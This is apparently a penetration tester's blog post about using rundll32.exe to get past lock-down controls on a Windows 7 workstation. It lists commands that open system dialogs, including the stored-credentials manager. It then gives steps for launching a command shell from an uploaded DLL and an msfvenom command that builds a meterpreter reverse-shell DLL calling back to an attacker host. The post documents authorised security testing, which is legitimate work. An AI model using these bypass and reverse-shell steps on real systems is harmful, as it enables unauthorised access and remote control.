I was recently on a Windows 7 workstation lock-down test which had been implemented pretty effectively with the vast majority of file and folder, service and AppLocker applied rules and permissions preventing the majority of malicious actions.<\/p>\n
However, I found that I was able to utilise rundll32.exe to attempt to enumerate\/manipulate the environment.\u00a0 I couldn’t really find a good pentest related resource for leveraging rundll32 so thought I’d a put something together to highlight what I’d found to be useful.<\/p>\n
All of the following commands have been tested on Windows 7 Ultimate, buts it’s worth bearing in mind that even if the command runs successfully you’ll still be restricted to the security context of the current user (but at least you’ll have a way of initiating the command \/ function that you may not have had before).<\/p>\n
I’ve also refrained from referencing any Control Panel (.cpl) related commands, as these can all be trivially called from C:\\Windows\\System32 (and most weren’t executable during my engagement).<\/p>\n
Note: The usage screenshots have been run from the command line for the sake of clarity, in reality you’re unlikely to have cmd.exe (or PowerShell) access and the rundll32 commands (and arguments) will need to be called via Windows shortcuts (as described towards the end of this post).<\/p>\n
Main Commands:<\/strong> rundll32.exe keymgr.dll, KRShowKeyMgr – Stored Usernames\/Passwords<\/strong> (see below)<\/p>\n rundll32 Shell32.dll,OpenAs_RunDLL file.abc – Change file associations<\/strong> (e.g. ext .abc)<\/p>\n rundll32.exe van.dll,RunVAN – Network Popup<\/strong> (Subsequently access networking?) More<\/strong> Intrusive Commands:<\/strong> <\/p>\n Utilise a Third Party .DLL?<\/strong><\/p>\n Didier Steven’s has produced a nice write up on taking a third party command interpreter and converting it from .exe to .dll, for more information see: Didier’s Blog<\/a><\/p>\n If we’re able to upload our new .dll to our target system we may be able to leverage a command prompt via rundll32.exe, the steps to do this are as follows:<\/p>\n 1. Upload Didier Steven’s cmd.dll to your target system. Metasploit Reverse Shell?<\/strong><\/p>\n Another option to abuse rundll32 maybe to upload a Metasploit derived .dll, the steps to do this are as follows:<\/p>\n 1. Create our reverse_shell .dll file: 2. Upload the reverse_shell payload .dll file to our target system e.g. HTTP<\/p>\n 3. Start our reverse listener on our pentest host via Metasploit’s: \/exploit\/multi\/handler<\/p>\n 4. Trigger the .dll via the same method used with cmd.dll (above), i.e. via a shortcut: By way of further reading; JavaScript can also be called through rundll32.exe, checkout the following post: References: I was recently on a Windows 7 workstation lock-down test which had been implemented pretty effectively with the vast majority of file and folder, service and AppLocker applied rules and permissions preventing the majority of malicious actions. However, I found that I was able to utilise rundll32.exe to attempt to enumerate\/manipulate the environment.\u00a0 I couldn’t … <\/p>\n
\nrundll32 Shell32.dll,SHHelpShortcuts_RunDLL Connect – Map Network Drives <\/strong>
\nrundll32.exe shell32.dll,Control_RunDLL – Control Panel<\/strong>
\nrundll32.exe devmgr.dll DeviceManager_Execute – Device Manager<\/strong> (view only)
\nrundll32.exe shell32.dll,Options_RunDLL 1 – Taskbar Options<\/strong>
\nrundll32.exe shell32.dll,Options_RunDLL 2 – Search Options<\/strong>
\nrundll32.exe shell32.dll,Options_RunDLL 3 – Start Menu Options<\/strong>
\nrundll32.exe shell32.dll,Options_RunDLL 4 – Turn System icons on\/off<\/strong>
\nrundll32.exe shell32.dll,Options_RunDLL 5 – Taskbar Notifications on\/off<\/strong>
\nrundll32.exe shell32.dll,Options_RunDLL 6 – Taskbar Toolbar Display Options<\/strong>
\nrundll32.exe shell32.dll,Options_RunDLL 7 – View File and Folder Options <\/strong>(see below)<\/p>\n
\nrundll32.exe shwebsvc.dll,AddNetPlaceRunDll – Add network location<\/strong> (wizard)
\nrundll32.exe oobefldr.dll,ShowWelcomeCenter – Start Welcome Centre<\/strong>
\nrundll32.exe dsquery,OpenQueryWindow – Find Users<\/strong> (New targets to brute force?)<\/p>\n
\nrundll32.exe powrprof.dll,SetSuspendState – Hibernate<\/strong>
\nRunDll32.exe user32.dll,LockWorkStation – Lock Screen<\/strong><\/p>\n
\n2. Create a new shortcut (on your desktop for example):
\nC:\\Windows\\System32\\rundll32.exe c:\\users\\test123\\desktop\\cmd.dll,Control_RunDLL<\/em>
\n3. Double click your new shortcut to pop your command shell<\/p>\n
\nmsfvenom -p windows\/meterpreter\/reverse_tcp -f dll LHOST=192.168.1.103 LPORT=12345 > .\/pentest.dll<\/em><\/p>\n
\n C:\\Windows\\System32\\rundll32.exe c:\\users\\test123\\desktop\\pentest.dll,Control_RunDLL<\/em>
\nWe now have a full meterpreter session in the context of our standard user, but we’re now able to initiate privilege escalation etc. via the Metasploit framework \ud83d\ude42<\/p>\n
\nhttp:\/\/www.kernelmode.info\/forum\/viewtopic.php?f=16&t=3377#p23362<\/a><\/p>\n
\nhttp:\/\/blog.didierstevens.com\/2010\/02\/04\/cmd-dll\/<\/a>
\nhttp:\/\/www.osattack.com\/windows-7\/huge-list-of-windows-7-shell-commands\/<\/a>
\nhttp:\/\/windows7tips.com\/rundll32-vista-windows-7.html\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"